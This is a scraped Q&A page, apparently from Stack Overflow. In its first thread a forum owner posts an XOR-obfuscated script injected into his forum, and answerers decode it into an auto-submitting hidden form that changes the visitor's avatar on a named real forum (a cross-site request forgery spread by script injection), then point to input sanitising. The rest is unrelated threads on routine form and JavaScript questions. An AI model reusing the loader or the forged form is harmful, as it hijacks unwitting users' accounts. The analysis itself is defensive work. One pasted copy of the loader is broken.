someone is using a weird script to bug my forum, I tracked it and found the javascript, but it's "encoded", can someone help me ?
here it is:
<script language="javascript">
var enkripsi="'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1#'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5#'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
</script>
Cleaning up the code results in
var enkripsi = "'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1#'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5#'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G";
teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2)
}
teksasli = unescape(teks);
document.write(teksasli);
Change the document.write to a console.log. Pop it into firebug and you get.
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." />
</p>
</form>
<script language="javascript">
<!-- function submit_form() { document.myform.submit() } -->
</script>
The real problem here is how is the user injecting the code into your site to being with. Are they entering it into a form and you are just outputting whatever they enter or is it a bug in the software you are using?
If it is a bug in the software, you upgrade.
If it is your code, you need to learn how to sanitize user input. OWASP has great info
Here is the deobfuscated JavaScript code:
<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." /></p>
</form>
<script language="javascript">
<!--
function submit_form()
{
document.myform.submit()
}
-->
</script>
enkripsi="'2C'2C'2C"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
var enkripsi=""; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)2) }teksasli=unescape(teks);document.write(teksasli);
Related
I am using Ajax to submit forms in serial. I am trying to make the first s_referee_email + s_referee_fname pair required while the second or others not - there will be up to five of these pairs. I cant seem to figure how to make just the first pair required without breaking the form. I have tried using HTML5 and some answers from stack but havent been able to get anything to work. Any advice is greatly appreciated!
fiddle: https://jsfiddle.net/badsmell/gcrvqbna/
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<!--serial submit ajax-->
<script>
function mySubmit(){
var myForms = $("form");
myForms.each(function(index) {
var form = myForms.eq(index);
var serializedForm = form.serialize();
serializedForm += '&s_referer_fname='+$('#s_refererFname').val();
$.post("http://post.aspx", serializedForm, function (data, status) {
if (status === "success"){
window.location.href= "http://redirect";
}
});
});
}
</script>
<title>Forward a copy to a friend</title>
<style type="text/css">
*[class=hide] {
display: none
}
</style>
</head>
<body>
<!--hidden iframe-->
<iframe class="hide" id="myIframe"></iframe>
<form method="post" action="post.aspx" target="myIFrame">
<input type="hidden" name="s_referer_email" value="test#test.com" />
<input type="text" size="30" maxlength="255" name="s_referee_email" value="" required >
<input type="text" size="22" maxlength="50" name="s_referee_fname" value="" required >
</form>
<form method="post" action="post.aspx" target="myIFrame">
<input type="hidden" name="s_referer_email" value="test#test.com" />
<input type="text" size="30" maxlength="255" name="s_referee_email" value="" >
<input type="text" size="22" maxlength="50" name="s_referee_fname" value="" >
</form>
<label for="s_referer_fname">Your name:</label> <br /> <input type="text" name="s_referer_fname" value="" size="20" id="s_refererFname" ><br>
<p><button onclick="mySubmit();">Submit</button> </p>
</body>
</html>
Adding required="required" to the tags can let you make any field compulsory to be filled by user.
You should never use .onclick(), or similar attributes from a userscript.
Userscripts operate in a sandbox, and onclick operates in the target-page scope and cannot see any functions your script creates.
Always use addEventListener() (or an equivalent library function, like jQuery .on()).
So instead of code like:
something.outerHTML += '<input onclick="func()" id="button_id" ...>'
You would use:
something.outerHTML += '<input id="button_id" ...>'
document.getElementById ("button_id").addEventListener ("click", func, false);
And for your answer, one method is to perform a check before actually submitting the forms. Check if the required fields have been filled, if yes, go ahead and submit the form, or else don't submit and show an error message instead.
*
<form id="5" form method="get" action="http://crimson-craft.buycraft.net/checkout/packages">
<input type="hidden" name="direct" value="true">
<input type="hidden" name="action" value="add">
<input type="hidden" name="package" value="1250806">
<input type="hidden" name="ign" value=username>
</form>
<script>
function buynow5() {
var username = prompt("Please enter your MineCraft username", "");
if (username != null) {
document.getElementById("5").submit();
}
}
</script>
Buy Now
*
So the java-script popup works and asks for a input, then submits the form, but the form doesn't pass the variable. I'm sorry if this a dumb question, but I'm very new to this.
Fix:
Change this:
<input type="hidden" name="ign" value=username>
to this:
<input id="usernameInput" type="hidden" name="ign" value="">
Then update your method like so:
function buynow5() {
var username = prompt("Please enter your MineCraft username", "");
if (username) {
document.getElementById('usernameInput').value = username;
document.getElementById('5').submit();
}
}
You can't bind javascript properties to HTML inputs without extra libraries.
Tip:
While you can make this work without any libraries, I highly suggest you look in to jQuery to facilitate DOM manipulation and interactive events. If you want more control and databinding, take a look at AngularJS as well.
Full Code:
<form id="5" form method="get" action="http://crimson-craft.buycraft.net/checkout/packages">
<input type="hidden" name="direct" value="true">
<input type="hidden" name="action" value="add">
<input type="hidden" name="package" value="1250806">
<input id="usernameInput" type="hidden" name="ign" value="">
</form>
<script>
function buynow5() {
var username = prompt("Please enter your MineCraft username", "");
if (username) {
document.getElementById('usernameInput').value = username;
document.getElementById("5").submit();
}
}
</script>
Buy Now
Aweber from data display javascript code something look like:
<script type="text/javascript">formData.display("name")</script>
<script type="text/javascript">formData.display("email")</script>
<script type="text/javascript">formData.display("phone")</script>
Now How can I use this in input filed value like:
<form method="post" action="">
<input name="name" type="text" value="<script type="text/javascript">formData.display("name")</script>">
<input name="email" type="text" value="<script type="text/javascript">formData.display("email")</script>">
<input name="phone" type="text" value="<script type="text/javascript">formData.display("phone")</script>">
<input type="submit" value="Go">
</form>
Reference: https://help.aweber.com/entries/21696333-How-Do-I-Display-Subscribers-Names-or-Email-Addresses-On-My-Thank-You-Page-
Please help me.
You can not simple place some code inside a value attribute hoping it will work, you need to appropriate JavaScript code to add the formData to the value attribute of the input field. You can do it with something like:
window.onload = function() {
document.getElementsByName('name')[0].value = formData.display("name");
document.getElementsByName('email')[0].value = formData.display("email");
document.getElementsByName('phone')[0].value = formData.display("phone");
}
this is my JS code to check the match of two digits
<script type="text/javascript">
function match(){
var a=parseInt(document.getElementById("one"));
var b=parseInt(document.getElementById("two"));
var c=parseInt(document.getElementById("sum"));
var d;
d=a+b;
if(d!=c)
{
alert("Something is wrong!!");
}
else
{
alert ("Success");
}
}
</script>
html code for generat two digits and check on the process.
<form action="#" method="post" onsubmit="return match();">
<input type="text" name="one" id="one" value="<?php echo rand(1,9); ?>" readonly="readonly"/>
+
<input type="text" name="two" id="two" value="<?php echo rand(1,9); ?>" readonly="readonly"/>
=
<input type="text" name="sum" id="sum" />
<input type="submit" value="submit" />
</form>
Perhaps you want their value and not the element itself.
var a=parseInt(document.getElementById("one").value,10);
var b=parseInt(document.getElementById("two").value,10);
var c=parseInt(document.getElementById("sum").value,10);
Also, provide the radix when you are using parseInt() otherwise it may go crazy sometimes.
First tentative steps into client side. I'm having trouble finishing the following. My question is how do I return the value of a function in a HTML statement ...
<script language="Javascript">
function checkjava()
{
return 1
}
</script>
</head>
<body>
<form action="enabled_catch.php" method="get" name="your_form">
<input type="HIDDEN" name="answer" value="RETURN checkjava() HERE")>
<input type="submit" value="click me">
</form>
</body>
I'd appreciate your help
Thanks in advance
G
<head>
<script language="Javascript">
function checkjava() {
return 1
}
</script>
</head>
<body>
<form action="enabled_catch.php"
method="get"
name="your_form"
onsubmit="this.answer.value=checkjava();">
<input type="hidden" name="answer">
<input type="submit" value="click me">
</form>
</body>
No need for the id attribute.
<form action="enabled_catch.php" method="get" name="your_form" >
<input type="HIDDEN" name="answer" value="RETURN checkjava() HERE")>
<input type="submit" onclick="document.getElementById('answer').value=checkjava();" value="click me">
You would do something like that:
<script language="Javascript">
function checkjava()
{
return 1
}
</script>
</head>
<body>
<form action="enabled_catch.php" method="get" name="your_form" onsubmit="document.getElementById('answer').value=checkjava();">
<input type="HIDDEN" id="answer" >
<input type="submit" value="click me">
</form>
</body>
Basically on form submit you would set the value of the answer input to the result of the function call.
EDIT: placed onsubmit on the wrong element before (embarrassing).
I would have an id on the answer tag and then do it in the form onsubmit event.
Something like:
<form onsubmit="document.getElementById("answerId").value = checkJava()" action="enabled_catch.php" method="get" name="your_form">
<input type="HIDDEN" name="answer" id="answerId" value="RETURN checkjava() HERE")>
<input type="submit" value="click me">
</form>
Browser-side scripting is event driven. Unless an event is triggered, nothing happens.
You could listen to the click event on your submit button, and then manipulate the value of your hidden field:
<input type="hidden" id="answer" name="answer" value="")>
<input type="submit" value="click me"
onclick="document.getElementById('answer').value = checkjava();">
Note how we had to give an id to the hidden field, in order to be able to reference it with getElementById().
Also note that JavaScript is case sensitive: checkjava() and checkJava() are not the same.
<script>
document.your_form.answer.value = checkjava();
</script>
Unless you want to use a fancy JS library. =)